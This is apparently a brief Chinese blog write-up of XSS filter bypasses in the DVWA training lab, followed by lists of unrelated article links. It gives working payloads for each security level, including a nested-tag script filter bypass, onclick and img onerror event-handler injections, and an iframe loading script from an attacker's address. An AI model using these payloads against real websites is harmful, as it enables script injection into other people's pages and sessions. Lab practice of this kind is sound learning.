DVWA的Xss跨站总结
2024-09-12 07:23:44
Xss跨站总结
初级防护的代码
Poc:<script>alert(1)</script>
上图防护的代码 为输入的结果就为输出的结果
中级防护的代码
Poc:<scri<script>pt>alert(1)</script>
上图为输入的文本中只要包含<script>就给替换成空
解决思路:<scri<script>pt>alert(1)</script> 在<script>中再添加一个<script> 后添加的<script>替换为空但是外面的<script>依旧可以拼接起来。
高级防护的代码
图上为只要包含script就替换掉
解决方法:
<a href=” onclick=alert(‘xss’)>zet</a> #创建一个点击键zet点击后执行onclick=alert(‘xss’)
<img src=http://172.16.1.23/a.jpg onerror=alert(‘xss’)> #当错误时执行alert(‘xss’)
<iframe width=300 height=100 src=”http://攻击脚本地址”></iframe>
最新文章
- windows forms 上一个类似于wpf snoop 的工具: Hawkeye
- 关于WPF中ItemsControl系列控件中Item不能继承父级的DataContext的解决办法
- C#学习之LinqtoSql类的简单例子
- CSV 文件读取类
- 测试peerdroid示例程序步骤
- 集合框架Map之entrySet方法的使用
- Jquery zTree的使用
- Centos安装成功mysql-5.5.37
- codeforces D. Multiplication Table
- 如何为 setTimeout() 方法传参
- 用Web抓包分析工具Livepool 实现本地替换开发
- 遍历文件 创建XML对象 方法 python解析XML文件 提取坐标计存入文件
- hihoCoder1310 岛屿 (dfs)
- 初识 go 语言
- 腾讯开源项目phxpaxos的编译步骤
- Stable Fur Generation on Mesh
- mysql语句-DML语句
- SpringBoot------连接MySQL报错:The server time zone value &#39;&#214;&#208;&#185;&#250;&#177;&#234;&#215;&#188;&#202;&#177;&#188;&#228;&#39; is unrecognized
- vi分屏指令
- Java技术学习路线笔记:Maven安装和作用
热门文章
- 《LINUX内核设计与实现》第三周读书笔记——第一二章
- Mybatis:Eclipse引入dtd约束文件使得xml文件有提示
- 人生第一次JAVA编程,电梯(并不算完成版),以及IDEA里使用git
- Docker(四)-Dcoker镜像
- OneZero第三次站立会议(2016.3.23)
- C#中几种创建对象的方式的对比
- 用jq获取元素内文本,但不包括其子元素内的文本值的方法
- catboost原理以及Python代码
- 【codeforces666E】Forensic Examination 广义后缀自动机+树上倍增+线段树合并
- 编译nginx平滑添加stream模块